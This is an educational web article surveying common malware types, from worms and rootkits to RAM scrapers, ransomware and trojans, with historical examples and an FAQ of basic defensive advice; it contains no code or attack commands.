Malware (also known as malicious program) is any piece of program that is written with the intent of doing harm to devices and data. It is created with an objective in mind. While the objective is limited only to the imagination of its creator, most malicious programs are written to steal data, credentials, and payment information.
Malware attacks can occur on all kinds of devices and operating systems, including iPhones, Android phones, Macbooks, Windows PC, and even Linux.
According to SonicWall Capture Labs, more than 5 billion malware attacks are carried out every year. About 92% of them are delivered via email. Over the past few years, the volume of mobile malware and macOS malware has increased drastically.
Today, more than 18 million websites are infected with malicious code at any given time every week, 34% of businesses are hit with malware, and 80% of financial institutions are targeted by malware every year.
With the advent of machine learning and targeted spear-phishing emails, malware attacks have become even more sophisticated and difficult to identify.
Therefore, it is important to recognize all sorts of malicious software that could affect your personal or business data. Below, we have listed several different types of malware that are used broadly against corporate and government websites to gather sensitive information and disrupt their operations. They all behave in a certain way and have unique characteristics.
Table of Contents
Hex dump of the Blaster worm
Example: Conficker (affected home and office Windows computer in over 190 countries)
A worm can propagate or self-replicate from one device to another without any human intervention. This type of malware doesn’t even need to attach itself to an application in order to cause damage.
It could either arrive as attachments in instant messages or spam emails, or could be transmitted via software vulnerabilities. Once installed on the machine, it silently works in the background without users’ knowledge.
It can modify/delete existing files or inject malicious code into the operating system. This makes it easier for attackers to install a backdoor, steal data, and gain control over a device and its system settings.
Some worms are designed with the sole purpose of exhausting system resources. They can make millions of copies of themselves over and over, depleting storage space or bandwidth by overloading a shared network.
Since worms do not require a host program, they are more infectious than usual computer viruses. Not only do they infect local machines, but also servers and clients on the network.
One of the popular examples of a computer worm is ILOVEYOU. Also called Log Bug, it infected more than 50 million Windows PC in 2000. It spread like wildfire because of its ability to access email addresses found in a user’s Outlook contact list and send a copy of itself to all those addresses.
Example: Backdoor.Coreflood (records every keystroke and sends this data to attackers)
Keylogger can be a software or hardware device designed to secretly monitor and log all keystrokes. It creates records of everything you type on a computer or smartphone screen. Every record is stored in a file to be retrieved at a later time.
While most keyloggers record data such as length of the keypress and velocity of keypress, some record everything on users’ copy-cut-paste clipboard, GPS data, calls, and microphone and camera footage.
In most cases, keyloggers are used for legitimate purposes like feedback for software development and studying keystroke dynamics or human-computer interaction. However, when used for harmful purposes, keyloggers can serve as malicious software.
Attackers can install keyloggers on your device (without your knowledge) to steal sensitive information, passwords, and financial information. Whether for malicious intent or for legitimate uses, you must be aware of the data keyloggers are capturing from your device.
Example: Stuxnet (reportedly ruined 1/5th of Iran’s nuclear centrifuges, infected 200,000 industrial computers, and caused 1,000 machines to physically degrade)
A rootkit is a set of malicious tools that give unauthorized access to a software or whole operating system. It is designed to remain hidden on a target machine. While you might not notice rootkits, they remain active in the background, giving attackers the ability to remotely control your device.
Rootkits can contain many different programs, ranging from scripts that make it easy for attackers to steal your passwords and banking information to modules that allow them to disable your security software and track everything you type on your computer.
Since rootkits can disable the security software installed on your machine, they are very hard to detect. They can live on your device for weeks or even months, causing substantial damage.
They can be detected by using an alternative reliable operating system, difference scanning, signature scanning, memory dump analysis, and behavioral-based methods.
Removal can be difficult or almost impossible, especially when the rootkit hides in the kernel. In such cases, the only way to completely eliminate the rootkit is to erase everything and install a new operating system. The situation gets even worse when you are dealing with firmware rootkits — you may need to replace certain parts of the hardware.
10. Fileless Malware
Example: WannaMine (mines cryptocurrency on the host device)
Fileless malware emerged in 2017 as a mainstream type of attack. They abuse programs integrated with Microsoft Windows to carry out attacks. More specifically, they leverage PowerShell, a task automation and configuration management program developed by Microsoft, to execute attacks.
This type of malware is not stored or installed directly on a device. Instead, they go straight into the memory (RAM), and malicious code never touches the secondary storage (SSD or HDD).
As the name suggests, they do not rely on files and leave no footprint. This makes it very difficult to identify and delete fileless malware — without an executable file, there is no signature or pattern for antivirus tools to detect.
Fileless malware has been proven effective in evading anti-computer forensic strategies such as signature detection, pattern-analysis, time-stamping, file-based whitelisting, and hardware verification. Though they can be detected by modern, sophisticated security solutions.
And since they are designed to work in RAM only, their longevity exists until the system is rebooted.
Example: Appearch (inserts too many ads into the browser and makes surfing next-to-impossible).
Adware, also known as advertising-supported software, displays ads on a computer and smartphone screen, redirects search results to advertising sites, and tracks users’ data for marketing purposes.
The primary objective of adware is to generate revenue by serving ads to users when they are installing an application or surfing the web.
Sometimes, the term adware is used to describe a type of malicious tool that presents annoying ads to the user. These ads come in various forms, such as pop-up, a banner display, a static box display, a not-closable window, a video with sound, etc.
Although they are not dangerous or harmful, they can make your computer ridiculously slow. Too many ads on a single webpage can make your browser unresponsive, especially if you are using an old device.
Besides slowing down your system, some adware tools are designed to collect users’ data and their behavior. They can track browsing history, search queries, time spent on a particular website, purchases, IP addresses, and device information.
8. Malicious Bots
Example: Srizbi (As of 2008, it was the largest botnet responsible for sending out over 50% of all the spam being sent by other major botnets combined)
Internet bots, also known as web robots, are designed to run automated tasks (scripts) over the internet. They can efficiently perform simple and repetitive tasks—for example, collecting data from billions of web pages. The advent of machine learning techniques has led to the development of more sophisticated bots that can imitate human behavior.
However, attackers realized the potential of bots a long time ago and started using them for harmful purposes. Today, a significant portion of all bots are used to steal users’ data and passwords.
Malware bots can infect a large number of devices. Such a large network of devices infected by bots is called a botnet. Botnets can be used to carry out DDoS attacks, send spam, and steal data. They can even allow attackers to access the device and its connections and overwhelm servers until they crash.
Since botnets don’t have a large footprint, users might never realize their devices are being used as a part of the botnet to relay spam. However, the device might start showing some symptoms such as sluggish performance, frequent crashes without an identifiable reason, and slow internet access.
Example: Targeted attacks sent via SMTP
Crimeware is any computer program that automates cybercrime and makes it easier to perform illegal activities online. These programs are meant to automate the theft of data, helping attackers gain access to people’s financial accounts online.
Attackers employ various techniques to steal confidential data through crimeware. For example, they can use scripts to redirect a user’s web browser to a counterfeit website, steal passwords cached on a system, enable remote access into apps, encrypt all data on a device, or secretly install keystroke loggers.
Cybercrime has also taken some pointers from the cloud computing industry and has begun developing “as-a-service” offerings as well.
Crimeware-as-a-Service allows specialization in specific areas. This means no one has to know how to do everything, and the entire process can be carried out more efficiently.
For example, rather than one attacker running the entire malicious operation, roles may be spread over multiple attackers doing different jobs and splitting the profits. A cybercriminal team may include a developer writing a malicious script, another creating mailing lists, a third attacker handling customer service (for ransomware), and a fourth transforming valuable data or currency into untraceable profit.
6. RAM Scraper
Example: BlackPOS (stole the personal information of 96 million customers in 2013)
RAM Scraper is a malicious program that scans the primary memory of infected devices to steal confidential data. Since it targets the terminal used to process retail transactions, it is also called Point-Of-Sale (POS) attack.
The payment card industry uses a set of data security standards (known as PCI-DSS), which require end-to-end encryption of sensitive information. The sensitive payment is decrypted in the POS’s RAM for processing, and this is where the RAM Scraper malware strikes. It utilizes regular expression searches to collect the plain-text payment data. The data is then sent to rogue callhome servers.
The first RAM scraping attack was reported in 2008 by the American multinational financial services corporation Visa Inc.
Only cards with magnetic strips are vulnerable to this type of malware. The magnetic stripe contains three data tracks: Track 1, Track 2, and Track 3. RAM Scraper implements expression matches to gain access to Track 1 and Track 2 card data from the primary memory of the POS terminal. A few scrapers utilize the Luhn algorithm to find the card validity before exfiltration.
Example: Titanium (includes a complex sequence of dropping, downloading, and installing pages, with the deployment of a Trojan backdoor at the final phase)
A backdoor is a covert technique of bypassing conventional authentication or encryption procedures in a computer or embedded device. As a result, access is granted to the system or application, such as databases or file servers, giving cybercriminals the ability to remotely control the system and update malware.
Typically, backdoor installation is achieved by leveraging vulnerable modules in an application. For instance, outdated plugins and default passwords can operate as backdoors if they are not updated/changed by the user for a very long time.
Small firms are particularly vulnerable to backdoor attacks because they don’t have big financial resources to safeguard their computer or identify successful attacks. That is why more than 40% of cyberattacks are aimed at small businesses.
Unlike other malware like RAM scrapers, backdoors aren’t going away anytime soon. According to the Malwarebytes Labs report, backdoors are among the five most common threat detection for both consumers and businesses.
WannaCry ransom note on an infected system (2017)
Example: WannaCry (targeted Windows PC by encrypting files and demanding $300-$600 ransom payments via Bitcoin)
Ransomware encrypts the victim’s personal data or blocks access to it. Depending on the type of ransomware, either individual files or the entire operating system is encrypted.
The attacker then demands a ransom from the victim to restore access upon payment. This demand usually comes with a deadline. If the victim doesn’t pay before the deadline, his/her data is deleted forever or the ransom increases.
Attackers give instructions to the victim explaining how to pay the fee to get the description key. The cost ranges from a few hundred dollars to millions. They demand ransoms in Bitcoin and other cryptocurrencies, which makes tracing and prosecuting the perpetrators difficult.
A new global research report shows that 35% of businesses pay ransom between $350,000 and $1.4 million, while 7% pay ransoms over $1.4 million.
In most cases, attackers target universities and small businesses because they seem more likely to pay a ransom quickly. They also target medical facilities, law firms, and government agencies that may be willing to pay to regain immediate access to their files or keep news of a compromise quiet.
Example: DarkHotel (selectively attacks high-profile visitors through hotel WiFi network)
Spyware installs itself on your device and starts covertly tracking your online behavior without your knowledge or permission.
It’s a kind of malware that secretly gathers data about a user or a business and sends that data to other parties such as marketing and advertising firms. Usually, it is installed without user consent by methods like a deceptive pop-up window, a drive-by download, or malicious code injected (hidden) into legitimate software.
Once installed, spyware can monitor your internet activity, track logic credentials, and spy on personal information. Its primary goal is to steal credit card numbers, user names, passwords, and banking information.
This type of malware can be difficult to detect. The infected device shows a noticeable reduction in connection speeds, responsiveness, and battery life.
One of the most popular examples of spyware is Pegasus. It is capable of tracking calls, reading text messages, locating tracking, accessing the target device’s camera and microphone, collecting passwords and data from apps. What makes this spyware dangerous is it can be installed on smartphones (running on Android and iOS) through a zero-click exploit.
Example: Wirenet (a password-stealing Trojan that targets macOS, Linux, Windows, and Solaris users)
Trojans pretend to be something useful while actually causing harm to your computer. They can hide in unexpected places like downloads and emails.
A Trojan seeks to deceive users into loading and executing a malicious program on their devices. Once installed, it can disrupt, steal, or inflict some other harmful actions on users’ data and network.
Unlike viruses, Trojans cannot manifest themselves. So this type of malware requires users to download and install a server-side application for it to work. Once the system is infected, it can spread the malware to other devices.
The injected machine can be remotely controlled by attackers without the owner’s knowledge. Attackers can then turn it into a zombie computer to continue sharing malicious code across devices on a network.
Depending on the type of Trojan and its purpose, the malware may self-destruct, return to being dormant, or remain active on the computer.
Zeus Trojan, for example, is designed to steal users’ data and banking information. It targets Microsoft Windows users. It was first identified in 2007 when it targeted the US Department of Transportation. It became more widespread in 2009, infecting more than 74,000 FTP accounts of numerous popular websites, including Amazon, NASA, Cisco, and Bank of America.
Example: Brain (first computer virus for IBM PC and compatibles)
A computer virus is a malicious script that can self-replicate to another application, document, or device boot sector, changing the way the device works. It requires some sort of human intervention to spread between systems.
The first computer virus was developed in 1971 with the sole purpose of testing whether a software program could replicate itself. However, soon it was found that attackers were utilizing self-replicating programs to steal information or deplete system resources.
A virus contains three major components:
- Infection vector, which determines how the virus propagates from one system to another
- Logic bomb is a compiled version of a script that activates as soon as the specified conditions are met (for example, when a user opens a file).
- Payload is the component of the attack that causes harm to the target system.
Most viruses come from internet file download, email, text message attachments, and social media scam links. Once you download or install the malicious program, the virus can infect other devices on the same network.
It can corrupt files, spam your email contacts, log keystrokes, steal passwords, and even take over your computer. While some viruses are written to disrupt the system’s performance or cause permanent damage to operating systems, some replicate themselves to flood the network with traffic, making the service unreachable.
Frequently Asked Questions
What can malicious code do?
Depending on the purpose of malware, it can degrade the device performance, crash applications randomly, add new programs into your system, delete existing applications, send spam, and steal your sensitive information and passwords.
In a nutshell, a malicious script has the ability to not only steal your private information but also destroy your assets and business as a whole in the process.
What type of software protect against malware?
Modern antivirus software and malware removal tools have been proven effective against many different types of malicious programs. They thoroughly scan devices to detect harmful scripts and provide automatic updates for enhanced protection against newly developed malware.
Some tools have adopted machine learning techniques to effectively spot and classify malware while minimizing the number of false positives.
What are the most effective ways to defend against malware?
To prevent your machines from being infected with harmful scripts, you should —
- Install antivirus software and firewall
- Regularly update your operating system and applications
- Download and install apps from trusted sources
- Never open suspicious files attached in emails
- Backup data regularly
In order to keep your device running smoothly, you can also take some additional steps, such as keeping files and folders uncluttered, emptying recycle bin, and running the Disk Defragmenter and a Disk Cleanup program in Windows.